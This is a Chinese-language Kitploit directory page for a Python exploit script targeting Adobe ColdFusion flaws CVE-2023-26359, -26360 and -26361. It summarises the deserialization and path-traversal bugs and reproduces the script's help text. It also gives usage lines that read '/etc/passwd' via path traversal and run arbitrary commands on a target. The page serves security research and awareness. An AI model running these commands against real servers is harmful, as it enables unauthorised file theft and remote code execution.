Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-26360-adobe-coldfusion-rce-exploit — 针对 Adobe ColdFusion 漏洞 CVE-2023-26359、CVE-2023-26360 和 CVE-2023-26361 的 Python 漏洞利用脚本,可实现远程文件读取和命令执行。支持通过精心构造的请求进行任意文件读取和 RCE。 | Kitploit
工具/GitHubGitHub/jakabakos/cve-2023-26360-adobe-coldfusion-rce-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubjakabakos/cve-2023-26360-adobe-coldfusion-rce-exploit

CVE-2023-26360-adobe-coldfusion-rce-exploit

针对 Adobe ColdFusion 漏洞 CVE-2023-26359、CVE-2023-26360 和 CVE-2023-26361 的 Python 漏洞利用脚本,可实现远程文件读取和命令执行。支持通过精心构造的请求进行任意文件读取和 RCE。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
532年前尚未审核
分享

Adobe Coldfusion 中的严重漏洞(CVE-2023-26359、CVE-2023-26360 和 CVE-2023-26359)

2023 年 3 月 8 日,Adobe 发布了安全更新,以修复 Adobe ColdFusion(一款流行的 Web 应用程序开发平台)中的严重漏洞。这些漏洞被归类为不当访问控制和不安全的反序列化,当攻击者向 ColdFusion 服务器发送包含不可信数据的特制请求时,可导致未经授权的远程代码执行(RCE)。

该漏洞的利用无需用户交互,这使得它尤其严重,因为攻击者可以在用户不知情的情况下以当前用户的上下文执行任意代码。

美国网络安全和基础设施安全局(CISA)于 2023 年 12 月 5 日强调了此问题的严重性,发布了关于这些漏洞被积极利用的公告。他们指出,该漏洞正被网络威胁行为者利用,以获取面向公众的 Adobe ColdFusion Web 服务器的初始访问权限。其中最严重的漏洞CVSS 评分为 9.8,被归类为严重(Critical)。

因此,在进一步调查后,确认了三个不同的问题:

  1. CVE-2023-26359:不可信数据反序列化漏洞,可能导致以当前用户上下文执行任意代码。
  2. CVE-2023-26360:最初被认定为不当访问控制漏洞,可能导致以当前用户上下文执行任意代码,但后来 Adobe 将其改为不可信数据反序列化。
  3. CVE-2023-26361:路径名到受限目录的限制不当("路径遍历")漏洞,可能导致任意文件系统读取。

此漏洞利用脚本是为 vsociety) 上的 CVE 分析而编写的。

用法

帮助:

root@kitploit:~
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]

Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).

options:
  -h, --help            show this help message and exit
  --host HOST           Target host URL
  --read-file READ_FILE, -f READ_FILE
                        File path to read from the host
  --cmd CMD, -c CMD     Command to execute on the target
  --endpoint ENDPOINT   Endpoint URL
  --win                 Specify this if the target host is considered to be Windows.
  --proxy PROXY         Proxy URL
root@kitploit:~
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'

# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'                                          

免责声明

此漏洞利用脚本仅出于研究和开发有效防御技术的目的而创建,不应用于任何恶意或未经授权的活动。脚本的作者和所有者不承担因使用本软件而造成的任何滥用或损害的责任。强烈建议用户负责任地使用本软件,并仅遵守适用的法律法规。请负责任地使用。

下载工具